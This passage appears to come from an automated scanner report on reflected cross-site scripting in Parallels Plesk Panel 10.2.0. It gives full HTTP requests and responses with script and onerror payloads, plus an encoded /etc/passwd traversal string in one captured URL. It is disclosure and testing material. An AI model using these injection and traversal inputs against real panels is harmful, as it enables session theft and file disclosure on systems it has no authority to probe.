if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%2540%252Fdomain%25401%252Fbackup%252F%2Froot..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%2F%252Fplesk%252Fclient%2540%252Fdomain%25401%252Fdbbackup%252F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fbackup%252Flocal-repository%252F%26src%3D%252Fsmb%252Fweb%252Fview%26srcController%3DWebController' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Back Up Data Related to the Subscription <span class="name">nosedivesailing.com</span></span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/client.domain.backup.create/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/backup/ftp-repository/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;
function splitBackupChanged()
{
   if ( $('fid-split_backup_checkbox').checked ) {
       $('fid-split_backup').value = "true";
       $('fid-split_backup_size').enable();
   } else {
       $('fid-split_backup').value = "false";
       $('fid-split_backup_size').disable();
   }
}

function suspendDomainChanged()
{    
   if ( $('fid-suspend_domain_checkbox').checked ) {
       $('fid-suspend').value = "true";
       $('suspend_domain_warning').show();
   } else {
       $('fid-suspend').value = "false";
       $('suspend_domain_warning').hide();
   }
}

function contentChanged()
{    
   content = $('fid-backup_content_all').checked;    
   content_options = $('fid-content_type');
   if( content_options )
       content_options.disabled = !content;
}

function initScreen()
{
   $('fid-split_backup_checkbox').observe('click', splitBackupChanged);
   if( $('fid-suspend_domain_checkbox') )
       $('fid-suspend_domain_checkbox').observe('click', suspendDomainChanged);
   
   splitBackupChanged();
   if( $('fid-suspend_domain_checkbox') )
       suspendDomainChanged();
       
   $('fid-backup_content_all').observe('click', contentChanged);
   $('fid-backup_content_configuration').observe('click', contentChanged);
   contentChanged();
}

if (Prototype.Browser.IE) {
   Event.observe(window, "load", initScreen);
} else {
   Event.observe(document, "dom:loaded", initScreen);
}

</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [{"componentType":"Jsw.Pathbar.Item","title":"Backup Manager: Personal FTP Repository","href":"\/plesk\/client@2\/domain@1\/backup\/ftp-repository\/"}]
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"><DIV class="msg-box msg-info"><DIV><DIV><DIV><DIV><DIV><DIV class="msg-content"><SPAN class="title">Information:&nbsp;</SPAN>Backing up of domain vulnerable.host.fqdn was scheduled.</DIV></DIV></DIV></DIV></DIV></DIV></DIV><DIV class="msg-box msg-error"><DIV><DIV><DIV><DIV><DIV><DIV class="msg-content"><SPAN class="title">Error:&nbsp;</SPAN>Some fields are empty or contain an improper value.</DIV></DIV></DIV></DIV></DIV></DIV></DIV></div>


<form action="/plesk/client@2/domain@1/backup/create/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="48333f77aef379c04c82252b59636182">
   <input type="hidden" name="cmd" value="update">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   <div class="formArea">
<fieldset><legend>Backup settings</legend><table class="formFields" cellspacing="0" width="100%">

   <tr id="row-prefix">
       <td class="name"><label for="fid-prefix">Add prefix to backup name</td>
       <td><input type="text" name="prefix" id="fid-prefix" value="bak" size="30" ></td>
   </tr>
   <tr id="row-comment">
       <td class="name"><label for="fid-comment">Comments</td>
       <td><textarea class='comment' name="comment" id="fid-comment" rows="5" cols="50" wrap="off">Domain backup.
Creation date: May 23, 2011 02:39 PM</textarea>
       </td>
   </tr>
   
   <tr id="row-split_backup_size">
       <td class="name"><label for="fid-split_backup_checkbox">Create multivolume backup</label></td>
       <td>
           <input type="checkbox" class="checkbox" name="split_backup_checkbox" id="fid-split_backup_checkbox" />
           <input type="hidden" id="fid-split_backup" name="split_backup" value="" />
           <label for="fid-split_backup_size">Volume size&nbsp;</label>
           <input type="text" name="split_backup_size" id="fid-split_backup_size" value="2047" size=8 maxlength=8 />MB
       </td>
   </tr>

   <tr id="row-repository">
       <td class="name">Store backup in</td>
       <td>

           <div class="option"><input name="repository" id="fid-store_repository-local" value="local" type="radio" class="radiobox" checked>&nbsp;<label for="fid-store_repository-local">Server repository</label></div>


           <div class="option"><input name="repository" id="fid-store_repository-ftp" value="ftp" type="radio" class="radiobox" disabled>&nbsp;<label for="fid-store_repository-ftp">Personal FTP repository</label><span class="hint"> (FTP repository settings are not specified)</span>


           </div>
       </td>
   </tr>
   
   <tr id="row-email">
       <td class="name"><label for="fid-email">When backup task is completed, send notification e-mail to</label></td>
       <td><input type="text" name="email" id="fid-email" value="a42c4"><script>alert(1)</script>e3e36e04876dbfe97" size="30" maxlength="254"></td>
   </tr>
   
</table></fieldset>

<fieldset><legend>Backup content</legend><table class="formFields" cellspacing="0" width="100%">

   <tr>
       <td class="name">Back up</td>
       <td>
           <div class="option"><input name="content" id="fid-backup_content_configuration" value="configuration" type="radio" class="radiobox" />&nbsp;<label for="fid-backup_content_configuration">
               Domain configuration
           </label></div>
           <div class="option"><input name="content" id="fid-backup_content_all" value="configuration_and_content" type="radio" class="radiobox" checked />&nbsp;<label for="fid-backup_content_all">
               Domain configuration and content
           </label>&nbsp;<select name="content_type" id="fid-content_type" >    <option value='backup_content_all_at_domain' SELECTED>All configuration and content</option>
   <option value='backup_content_vhost_only'>All configuration and content except mail</option>
   <option value='backup_content_mail_only'>Only mail configuration and content</option>
</select>
</div>
       </td>
   </tr>


   <tr>
       <td class="name"><label for="fid-suspend_domain_checkbox">Suspend domain until backup task is completed</label></td>
       <td class="withWarning"><input type="checkbox" class="checkbox" name="suspend_domain_checkbox" id="fid-suspend_domain_checkbox" value="true" />
       <input type="hidden" id="fid-suspend" name="suspend" value="" />
       <span id='suspend_domain_warning' style="display:none;" class="warningHint">Domain will be unavailable during the backup process</span>
       </td>
   </tr>


</table></fieldset>
</div>


   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote"></td>
           <td class="misc" width="0" nowrap><DIV class="commonButton" id="bid-backup-now" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to back up data.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lsubmit(document.forms[0]);;return false;" style=""><BUTTON name="bname_backup_now" id="buttonid-backup-now" type="button" onClick="Event.stop(event);lsubmit(document.forms[0]);;return false;">Back Up</BUTTON><SPAN id="spanid-backup-now">Back Up</SPAN></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to cancel backup creation and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/ftp-repository/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/ftp-repository/&#039;); return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></td>
       </tr></table>
   </div>


</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

2.4. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/ [cmd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/hosting/file-manager/

Issue detail

The value of the cmd request parameter is copied into the HTML document as plain text between tags. The payload f81a3<script>alert(1)</script>c73b22d853a was submitted in the cmd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /plesk/client@2/domain@1/hosting/file-manager/?cmd=chdirf81a3<script>alert(1)</script>c73b22d853a&file=/httpdocs HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:27:43 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:27:43 GMT
Connection: close
Content-Length: 746

ERROR: PleskFatalException
Command not found: chdirf81a3<script>alert(1)</script>c73b22d853a

Additionally, an exception has occurred while trying to report this error: PleskBadURIException
Invalid URI: /plesk/client@2/register-domain/_73f7e"><a>dd81af60b61

0: common_func.php3:62
   psaerror(string 'Command not found: chdirf81a3<script>alert(1)</script>c73b22d853a')
1: cList.php:162
   cList->setFSP(string 'chdirf81a3<script>alert(1)</script>c73b22d853a')
2: FileManagerUIPointer.php:722
   FileManagerUIPointer->accessItem(string 'GET', NULL null)
3: client.domain.hosting.file-manager.php:87
   plesk__client__domain__hosting__file_manager->accessItem(string 'GET', NULL null)
4: UIPointer.php:600
   UIPointer->access(string 'GET')
5: plesk.php:47

2.5. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/odbc/dsn@new/properties/ [wizard parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/odbc/dsn@new/properties/

Issue detail

The value of the wizard request parameter is copied into the HTML document as plain text between tags. The payload a309d<script>alert(1)</script>1bfb6397ff22ab924 was submitted in the wizard parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /plesk/client@2/domain@1/odbc/dsn@new/properties/?name=%253C%2573%2563%2572%2569%2570%2574%253E%2561%256C%256&description=xss&driver=SQL+Server&forgery_protection_token=dc1721730e046f7e1de14c19e4a424be&cmd=update&lock=true&previous_page=%0d&wizstep=1&wizard=%2fplesk%2fclient@2%2fdomain@1%2fodbc%2fdsn@new%2fproperties%2fa309d%3cscript%3ealert%281%29%3c%2fscript%3e1bfb6397ff22ab924&wizaction=%0d HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/odbc/dsn@new/properties/
Cache-Control: max-age=0
Origin: http://www.nosedivesailing.com:8880
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dsnlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domainaliaseslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domaintrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:11:24 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:11:24 GMT
Connection: close
Content-Length: 834

ERROR: PleskBadURIException
Invalid URI: /plesk/client@2/domain@1/odbc/dsn@new/properties/a309d<script>alert(1)</script>1bfb6397ff22ab924

Additionally, an exception has occurred while trying to report this error: PleskBadURIException
Invalid URI: /plesk/client@2/domain@1/odbc/dsn@new/properties/a309d<script>alert(1)</script>1bfb6397ff22ab924

0: UIPointer.php:49
   UIPointer::parse(string '/plesk/client@2/domain@1/odbc/dsn@new/properties/a309d<script>alert(1)</script>1bfb6397ff22ab924')
1: common_func.php3:3913
   wizard_get()
2: Abstract.php:81
   Form_Abstract->__construct()
3: ODBCDSNPropertiesUIPointer.php:56
   ODBCDSNPropertiesUIPointer->_accessNewOdbc()
4: ODBCDSNPropertiesUIPointer.php:17
   ODBCDSNPropertiesUIPointer->accessItem(string 'GET', NULL null)
5: UIPointer.php:600
   UIPointer->access(string 'GET')
6: plesk.php:47

2.6. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/app/download-progress/catalogId/marketplace/taskId/2 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/app/download-progress/catalogId/marketplace/taskId/2

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7cc51(a)0b7b6224a5b was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /smb/app/download-progress/catalogId/marketplace/taskId/27cc51(a)0b7b6224a5b HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/app/market/id/marketplace
Cookie: locale=en-US; psaContext=dashboard; PLESKSESSID=483627fb8a4e908eab18dad06863ab2f

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 23:00:09 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 23:00:09 GMT
Connection: close
Content-Length: 8768

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="79f421900086c1962424e05d36c92e2a" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/smb/scripts/apscatalog.js?1302230704"></script>
<title>Downloading application - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/app/action-name/download-progress" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fapp%2Fdownload-progress%2FcatalogId%2Fmarketplace%2FtaskId%2F27cc51%28a%290b7b6224a5b' + '&activeModule=' + 'applicationsAndServices' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"active","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
</div>
<h2><span>Downloading application <b></b></span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<p>The application is being downloaded for installation now. Clicking any tab above will cancel the installation of this application.</p>
<script type="text/javascript">
Jsw.onReady(function() {
new Jsw.Panel({
renderTo: 'main',
cls: 'progress-bar-box',
items: [
new Smb.ApsCatalogDownloadBar({
locale: {"progress":"%%percents%%% completed"},
taskId: 27cc51(a)0b7b6224a5b,
catalogId: 'marketplace',
baseUrl: '/smb',
redirectUrl: "/app/select/packageId/%packageId%"
})
]
});
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

2.7. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/create [autoResponder%5BautoResponderSection%5D%5BcontentType%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/email-address/create

Issue detail

The value of the autoResponder%5BautoResponderSection%5D%5BcontentType%5D request parameter is copied into the HTML document as plain text between tags. The payload 8fa96<img%20src%3da%20onerror%3dalert(1)>6bd6b053919 was submitted in the autoResponder%5BautoResponderSection%5D%5BcontentType%5D parameter. This input was echoed as 8fa96<img src=a onerror=alert(1)>6bd6b053919 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /smb/email-address/create HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.1_rc3
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://www.nosedivesailing.com:8880/smb/email-address/create
Cookie: PLESKSESSID=d8ef408a62e3c0d46c9effc4a0828d66; locale=en-US
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 952

general%5BgeneralSection%5D%5Bname%5D=format-2&general%5BgeneralSection%5D%5Bpostbox%5D=0&general%5BgeneralSection%5D%5Bpostbox%5D=1&general%5BgeneralSection%5D%5BmboxQuotaValue%5D=-1&general-generalSection-mboxQuotaValue-selector=unlimited&general%5BgeneralSection%5D%5Bpassword%5D=thepassword&general%5BgeneralSection%5D%5BpasswordConfirmation%5D=thepassword&redirect%5BredirectSection%5D%5Benabled%5D=0&aliases%5BaliasesSection%5D%5BaliasesForm%5D%5Bc360707%5D%5BaliasName%5D=&aliases%5BaliasesSection%5D%5BaliasesForm%5D%5BdynamicSubFormTemplate%5D%5BaliasName%5D=&autoResponder%5BautoResponderSection%5D%5Benabled%5D=0&autoResponder%5BautoResponderSection%5D%5BcontentType%5D=false8fa96<img%20src%3da%20onerror%3dalert(1)>6bd6b053919&autoResponder%5BautoResponderSection%5D%5BforwardAddress%5D=&autoResponder%5BautoResponderSection%5D%5Battachments%5D%5BdynamicSubFormTemplate%5D%5Bfile%5D=&antivirus%5BantivirusSection%5D%5Benabled%5D=0&hidden=&forgery_protection_token=bdaafe67daaa200e2f077bd9577b09f4

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
